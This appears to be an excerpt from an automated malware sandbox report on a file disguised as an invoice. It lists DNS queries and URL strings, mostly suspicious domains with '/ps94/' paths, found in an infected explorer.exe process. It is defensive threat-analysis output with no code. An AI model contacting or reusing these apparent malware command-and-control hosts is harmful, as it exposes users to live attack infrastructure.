          Source: global trafficDNS traffic detected: DNS query: www.light-in-the-heavens.com
          Source: global trafficDNS traffic detected: DNS query: www.amycostellospeech.com
          Source: global trafficDNS traffic detected: DNS query: www.xsmci844n.xyz
          Source: global trafficDNS traffic detected: DNS query: www.whatsapp-p.vip
          Source: global trafficDNS traffic detected: DNS query: www.0909000000.com
          Source: global trafficDNS traffic detected: DNS query: www.parsendustriyel.com
          Source: global trafficDNS traffic detected: DNS query: www.vpdyt637j.xyz
          Source: explorer.exe, 00000006.00000002.4576280943.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4576280943.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000006.00000002.4576280943.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4576280943.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000006.00000002.4576280943.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4576280943.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000006.00000002.4576280943.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4576280943.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000006.00000002.4576280943.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000006.00000002.4571829030.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4574902482.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2145185137.0000000007B50000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000000.00000002.2140466216.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.0909000000.com
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.0909000000.com/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.0909000000.com/ps94/www.parsendustriyel.com
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.0909000000.comReferer:
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amycostellospeech.com
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amycostellospeech.com/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amycostellospeech.com/ps94/www.norlac.xyz
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amycostellospeech.comReferer:
          Source: explorer.exe, 00000006.00000003.2979546205.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2153411918.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2981509755.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2982113001.000000000C3BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2984151863.000000000C40D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.forluvofcomedy.com
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.forluvofcomedy.com/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.forluvofcomedy.com/ps94/www.t5u2s.xyz
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.forluvofcomedy.comReferer:
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hregrhherdhretdhrt.xyz
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hregrhherdhretdhrt.xyz/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hregrhherdhretdhrt.xyz/ps94/www.streamfly.video
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hregrhherdhretdhrt.xyzReferer:
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.htgithub.com
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.htgithub.com/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.htgithub.com/ps94/www.transpecosexpress.com
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.htgithub.comReferer:
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.huskyacres.net
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.huskyacres.net/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.huskyacres.net/ps94/www.rgrogerscreations.com
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.huskyacres.netReferer:
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.light-in-the-heavens.com
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.light-in-the-heavens.com/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.light-in-the-heavens.com/ps94/www.amycostellospeech.com
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.light-in-the-heavens.comReferer:
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.norlac.xyz
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.norlac.xyz/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.norlac.xyz/ps94/www.xsmci844n.xyz
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.norlac.xyzReferer:
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.parsendustriyel.com
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.parsendustriyel.com/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.parsendustriyel.com/ps94/www.vpdyt637j.xyz
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.parsendustriyel.comReferer:
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rgrogerscreations.com
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rgrogerscreations.com/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rgrogerscreations.com/ps94/www.light-in-the-heavens.com
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rgrogerscreations.comReferer:
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.streamfly.video
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.streamfly.video/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.streamfly.video/ps94/www.forluvofcomedy.com
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.streamfly.videoReferer:
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.t5u2s.xyz
          Source: explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.t5u2s.xyz/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.t5u2s.xyzReferer:
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.transpecosexpress.com
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.transpecosexpress.com/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.transpecosexpress.com/ps94/www.huskyacres.net
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.transpecosexpress.comReferer:
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vpdyt637j.xyz
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vpdyt637j.xyz/ps94/
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vpdyt637j.xyz/ps94/www.hregrhherdhretdhrt.xyz
          Source: explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vpdyt637j.xyzReferer:
